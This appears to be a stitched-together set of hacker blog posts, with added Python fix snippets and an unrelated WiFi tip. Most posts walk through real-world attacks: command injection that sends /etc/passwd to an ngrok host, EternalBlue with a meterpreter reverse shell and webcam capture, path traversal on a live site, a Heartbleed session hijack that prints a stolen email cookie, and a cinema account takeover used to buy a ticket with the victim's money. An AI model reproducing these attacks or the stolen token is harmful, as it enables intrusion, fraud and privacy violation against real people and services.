So back in December 2017 I found a command injection vulnerability on a job listing site. Here is a simple proof of concept. The vulnerable parameter is filename.

I tested with the command `sleep 5` and the response was delayed by 5-6 seconds (6.113 millis). See the delay in the right corner below.


I double-checked with `sleep 10` just to make sure and to see the difference. Again the response was delayed by 10-11 seconds (11.137 millis). See the delay in the right corner below.


I then tried pinging my server using `ping -c 5 ` and ran `tcpdump -i -n icmp` on my server to watch for incoming ICMP packets. That ping command sends 5 ICMP echo requests to my server's IP address.


Sorry for the redaction, but you can see 5 incoming ICMP packets. My server IP address is 5.000.000.105 and the incoming ICMP packets are from 000.000.39.169. Now I know the filename parameter is vulnerable to command injection.

I did another test using ngrok. I ran `./ngrok http 80` on my localhost and executed `curl blablabla.ngrok.io` through the vulnerable parameter.


Now see the request on the ngrok web interface (http://127.0.0.1:4040). I got an incoming request from IP address 000.000.39.169, the same IP address as in the ICMP requests above.


Now I can read files on the vulnerable server and send them to my ngrok address using `curl -F shl=@/etc/passwd blablabla.ngrok.io`. That command sends a POST request to blablabla.ngrok.io with a multipart form field shl containing the contents of /etc/passwd.


And the result: the vulnerable server sent its /etc/passwd to my ngrok address, again from IP address 000.000.39.169.


That's it! Happy hacking! :)
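As an added example (not code from the original post), here is how the server side could have handled the filename parameter safely in Python: an allow-list check plus running the external tool without a shell, so the `sleep 5` and `curl` payloads above are rejected before they reach any command line. UPLOAD_DIR and the function names are assumptions.

```python
import re
import subprocess
from pathlib import Path

# Hypothetical names: UPLOAD_DIR and the functions below are not from the original post.
UPLOAD_DIR = Path("/var/www/uploads")

# Allow-list: plain file names only. No '/', no whitespace, and none of the shell
# metacharacters (; | & ` $ ( ) newline) that an injected `sleep 5` relies on.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def is_safe_filename(name: str) -> bool:
    """True only for names that match the allow-list and contain no '..' segment."""
    return SAFE_NAME.fullmatch(name) is not None and ".." not in name


def build_argv(name: str) -> list:
    """Argument vector for the external tool (here `file`), built without a shell.
    Raises ValueError for anything that would have been injectable."""
    if not is_safe_filename(name):
        raise ValueError("rejected filename: %r" % name)
    # '--' ends option parsing: extra defence so a name can never be read as a flag.
    return ["file", "--", str(UPLOAD_DIR / name)]


def identify_upload(name: str) -> str:
    """Run `file` on the upload. shell=False (the default) means argv goes straight
    to execve, so '; sleep 5' or '`curl ...`' is never interpreted by /bin/sh."""
    result = subprocess.run(build_argv(name), capture_output=True, text=True, timeout=10)
    return result.stdout.strip()
```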

Just wanted to share this..

I'm using this Metasploit module: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.

Clone it and copy eternalblue_doublepulsar.rb to /usr/share/metasploit-framework/modules/exploits/windows/smb/.



Run msfconsole and scan your local network with auxiliary/scanner/smb/smb_ms17_010 (MS17-010 SMB RCE Detection).



Now use the exploit exploit/windows/smb/eternalblue_doublepulsar.
Set the necessary options like RHOST, TARGETARCHITECTURE, TARGET and PROCESSINJECT.
For DOUBLEPULSARPATH and ETERNALBLUEPATH, use the Eternalblue-Doublepulsar-Metasploit/deps/ directory, for example /root/Eternalblue-Doublepulsar-Metasploit/deps/.
Don't forget to set the PAYLOAD to windows/x64/meterpreter/reverse_tcp (my target uses x64, so I'm using an x64 payload too).


Once everything is set, run exploit.




Run some interesting commands like webcam_list or webcam_snap.




The victim desktop screenshot.


Tested on my local network; the tool used was Metasploit running on Kali Linux.
That's it, happy hacking!


This vulnerability counts as medium risk. All you need is the Cookies Manager+ add-on for Firefox, or any other add-on/plugin used to manipulate cookies.

Browse the page as usual.


Open Cookies Manager+ and search for the vulnerable cookie parameter, in this case C_UL. Double-click it, replace the content with an XSS payload and save it.





Go back to the browser, refresh the page and you will see the pop-up.



That's it! This kind of vulnerability is worth 50-100 USD in a bug bounty program. Happy hunting! :)


While browsing I found this cool remote file download vulnerability. :)

http://www.censored.or.id/index.php?m=default&s=download&path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==&file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==&hs=true

If I open the link above, it downloads a file for me. Now look at the path and file parameters: they are base64-encoded.

path=c3lzdGVtL21vZHVsZXMvYmVyaXRhL2ZpbGVzL2Rvd25sb2FkLw==
file=cHJlc2VudGF0aW9uX2ZpbmFsLnBwdA==

Decode both values and I get this.


path=system/modules/berita/files/download/
file=presentation_final.ppt

Now I know the path and the file name. What if I change them? Let's see.

path=L2V0Yy8=
file=cGFzc3dk

I changed the path value to /etc/ and the file value to passwd, base64-encoding them first.

http://www.censored.or.id/index.php?m=default&s=download&path=L2V0Yy8=&file=cGFzc3dk&hs=true

This modified link will download the passwd file from the system.



That's it.. :)


*Some links and values in this PoC have been censored/changed because this is a live website.
*The admin has been notified by email.
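As an added example (not the site's code), here is a Python download handler that decodes the same base64 path and file parameters and then refuses anything outside the intended download directory, which is the check the vulnerable page is missing. The web root and the ALLOWED_BASE layout are assumptions.

```python
import base64
import binascii
from pathlib import Path

# Assumed layout (not from the original post): the web root and the one directory
# the download module may serve from, i.e. the decoded "path" value seen on the page.
WEB_ROOT = Path("/var/www/html").resolve()
ALLOWED_BASE = WEB_ROOT / "system" / "modules" / "berita" / "files" / "download"


def decode_param(value: str) -> str:
    """Base64-decode a path/file parameter the way the site does. Base64 is an
    encoding, not encryption: anyone can decode it, and anyone can forge a new one."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("malformed parameter") from exc


def resolve_download(path_b64: str, file_b64: str) -> Path:
    """Return the file to serve, or raise ValueError if the decoded values would
    escape ALLOWED_BASE (the containment check the vulnerable handler lacks)."""
    rel_dir = decode_param(path_b64)
    name = decode_param(file_b64)
    if "/" in name or name in ("", ".", ".."):
        raise ValueError("bad file name")
    # lstrip('/') so a client-supplied absolute path such as "/etc/" cannot replace
    # the web root in the join; resolve() then collapses any "../" segments.
    candidate = (WEB_ROOT / rel_dir.lstrip("/") / name).resolve()
    if ALLOWED_BASE not in candidate.parents:
        raise ValueError("path escapes the download directory: %s" % candidate)
    return candidate


def is_allowed(path_b64: str, file_b64: str) -> bool:
    """Would this path/file pair be served at all?"""
    try:
        resolve_download(path_b64, file_b64)
        return True
    except ValueError:
        return False
```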



Well, this is an old vulnerability called Heartbleed (CVE-2014-0160). Let's exploit it.

Run the Heartbleed exploit and you'll get the Zimbra cookie.


See the Referer and Cookie? Use those to log in.

Referer: https://mx.tempo.co.id/
Cookie: ZM_TEST=true; ZM_AUTH_TOKEN=0_73ec70e72712cb16eaee148d405d1b8297c411f2_69643d33363a66356438353363632d633032372d343032302d383566322d3635636436366531623932313b6578703d31333a313438373232343637313230353b747970653d363a7a696d6272613b; JSESSIONID=1xv343h6xss51a0uhvn29oe6x

Open the Referer site (https://mx.tempo.co.id/) in a Firefox that has the Cookie Injector plugin installed and press Alt+C to show Cookie Injector.


You'll see "Wireshark Cookie Dump" there. Now paste the Cookie and click OK. You should get a pop-up saying "All Cookie Have Been Written".


Refresh (F5) the site and you are now logged in to the user's email.


Type password in the search box and hit Enter... :p



./NoGe

Hi, it's been a while since my last post.. :)



21 Cineplex is one of the largest cinema groups in Indonesia (Cinema 21, Cinema XXI and The Premiere). In this post I want to show you how I bought a ticket using someone else's account on the 21 Cineplex website. Well, this is an old vulnerability, but they never fixed it, so let's have some fun. :p

Start by finding the user's cookies and referer link.



I will use these cookies and this referer link. Open the referer link in the browser.



As we can see on the left side, I don't have access to this account. Now use the user's cookies.
I'm using Cookie Injector to write the cookies.




Copy and paste the user's cookies into Cookie Injector, then click OK and we get the screen below. This means the user's cookies were written successfully.



Now reopen the referer link. I am automatically logged in to the user's page.



Let's buy a ticket with this account. The account balance is Rp. 165.000.
I want to watch Inferno :)



Select the city, cinema, date, time and how many tickets we want to buy. Click CONTINUE, select a seat and click BUY NOW.




Transaction process.



And I have my free ticket.. :)
I also have the transaction code 11636 to pick up the ticket.



As we can see, the user's balance is now Rp. 104.000.




That's it for today. I have a movie to watch. :p



Stay safe! Stay cool! :)


Hi all..

I'm using an HP ProBook with Kubuntu 14.04, but my WiFi keeps dropping the connection.
I have to reboot the laptop to connect to WiFi again.

I used this command to fix my WiFi problem and it's working fine.


echo "options rtl8723be fwlps=N ips=N" | sudo tee /etc/modprobe.d/rtl8723be.conf
Anyway, my chipset is Realtek Semiconductor Co., Ltd. RTL8723BE PCIe Wireless Network Adapter.

This setting can differ depending on your chipset.
To see your chipset, you can use this command.

lspci

I hope this is useful for you too!



./NoGe